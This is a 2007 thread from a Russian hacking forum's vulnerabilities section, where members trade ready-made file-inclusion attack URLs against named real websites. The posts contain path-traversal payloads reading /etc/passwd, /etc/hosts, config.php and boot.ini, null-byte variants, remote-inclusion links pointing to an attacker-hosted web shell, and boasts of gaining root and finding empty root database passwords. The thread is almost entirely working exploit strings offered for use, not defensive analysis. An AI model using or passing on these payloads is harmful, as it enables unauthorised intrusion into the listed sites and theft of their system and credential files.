HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 19.05.2007, 19:40
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

Код:
http://www.star-corp.de/include.php?file=/etc/passwd
http://www.rwies1406.de/include.php?file=/etc/passwd
Для экстрималов =))
Код:
http://www.lu2705.de/include.php?file=/bin/sh
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #2  
Старый 21.05.2007, 12:24
ForWarD-Hack
Новичок
Регистрация: 22.01.2007
Сообщений: 10
Провел на форуме:
78255

Репутация: 12
По умолчанию

Цитата:
http://www.apsny.ru/history/history.php?page=../forum/
админы жгут.. ) пасы на рута в 1й из баз пустые.. +)
 
Ответить с цитированием

  #3  
Старый 21.05.2007, 13:08
ForWarD-Hack
Новичок
Регистрация: 22.01.2007
Сообщений: 10
Провел на форуме:
78255

Репутация: 12
По умолчанию

Цитата:
http://ecsg.free.fr/index.php?page=[локальный]
include ""; =)
Цитата:
http://www.24hoursupport.com/index.php?page=[локальный]
fopen($menu_file_name, "r");
 
Ответить с цитированием

  #4  
Старый 21.05.2007, 14:05
ForWarD-Hack
Новичок
Регистрация: 22.01.2007
Сообщений: 10
Провел на форуме:
78255

Репутация: 12
По умолчанию

Цитата:
http://lib.nbu.bg/eng/index.php?page=..\..\..\..\boot.ini
виндя

Цитата:
http://www.forestry.caf.wvu.edu/wvu_woodscience/index.php?page=../config.php
Цитата:
http://www.stlouisreview.com/archive/archive.php?page=[локальный]
Цитата:
http://www.bayareabikes.org/btwd/index.php?page=../../../../../../../etc/passwd
Цитата:
http://www.drps.org/template.php?page=/etc/passwd
Цитата:
http://www.myspacegraphicshelper.com/index.php?page=/etc/passwd
Цитата:
http://www.nnhs.net/library/show.php?page=[локальный]
но при желании можно сделать удалённый


Цитата:
http://www.egir.dk/index.php?page=/etc/passwd

Пока всё... скоро будет пополнение.. у мну ещё скулей много
 
Ответить с цитированием

  #5  
Старый 21.05.2007, 20:46
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


По умолчанию

всеми любимый дом2, правда только wap пока...

http://wap.dom2.ru/index.php?area=../../../../../../../../../etc/passwd%00

или

http://wap.dom2.ru:81/index.php?area=../../../../../../../../../etc/passwd%00
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #6  
Старый 23.05.2007, 10:25
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,187
Провел на форуме:
6023777

Репутация: 2642


Post

1.
Цитата:
http://www.hd82.com/hd82/?doc=[url]
2.
Цитата:
http://raben.andre-mittelstädt.de/pub/cmpro.ext/include.php?url=../../../../../../etc/passwd
http://raben.andre-mittelstädt.de/pub/cmpro.ext/include.php?url=../../../../../../etc/hosts
http://raben.andre-mittelstädt.de/pub/cmpro.ext/include.php?url=../../../../../../etc/syslog.conf

Последний раз редактировалось NOmeR1; 23.05.2007 в 11:08..
 
Ответить с цитированием

  #7  
Старый 26.05.2007, 02:43
Muhacir
Участник форума
Регистрация: 05.10.2006
Сообщений: 133
Провел на форуме:
548338

Репутация: 165
По умолчанию

http://www.proteger.org.ar/download.php?file=[local]
 
Ответить с цитированием

  #8  
Старый 27.05.2007, 18:18
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


По умолчанию

Код:
http://www.starcat-dev.de/display.php?file=24&lan=[сайт]
вместо [сайт] соответственно адрес сайта вида http://site.narod.ru на котором есть шелл с названием shortnews.txt

ЗЫ кстати благодаря этой инъекции я получил root, без использования сплойтов и не расшифровывая хешей
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #9  
Старый 28.05.2007, 13:25
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,187
Провел на форуме:
6023777

Репутация: 2642


По умолчанию

Это не инклуды, это require_once, но разницы походу никакой..
1.
Цитата:
http://www.photoconcept.ch/~scoutsmeyrin/index.php?require=[url]
2.
Цитата:
http://www.dreamsodam.co.kr/taeil.php?require=../../../../../../etc/passwd
http://www.dreamsodam.co.kr/taeil.php?require=../../../../../../etc/hosts
http://www.dreamsodam.co.kr/taeil.php?require=../../../../../../etc/syslog.conf
3.
Цитата:
http://www.pandora-asia.org/panprojects.php?main=[url]
http://www.pandora-asia.org/panprojects.php?main=../../../../../../etc/passwd
http://www.pandora-asia.org/panprojects.php?main=../../../../../../etc/hosts
http://www.pandora-asia.org/panprojects.php?main=../../../../../../etc/syslog.conf

Последний раз редактировалось NOmeR1; 28.05.2007 в 13:32..
 
Ответить с цитированием

  #10  
Старый 29.05.2007, 22:26
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,187
Провел на форуме:
6023777

Репутация: 2642


По умолчанию

1.
Цитата:
http://www.almoayedgroup.com/newsdesc.php?fileinclude=../../../../../../etc/passwd
http://www.almoayedgroup.com/newsdesc.php?fileinclude=../../../../../../etc/hosts
2.
Цитата:
http://www.marionovak.com/proba/include.php?includefile=[url]
3.
Цитата:
http://www.dominoua.com.ua/build.php?file=[url]
4.
Цитата:
http://www.kiyavia.crimea.ua/index.php?[url]

Последний раз редактировалось NOmeR1; 29.05.2007 в 22:52..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PSalm69 Избранное 273 13.02.2016 01:24
Books PHP FRAGNATIC PHP 186 21.02.2010 02:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.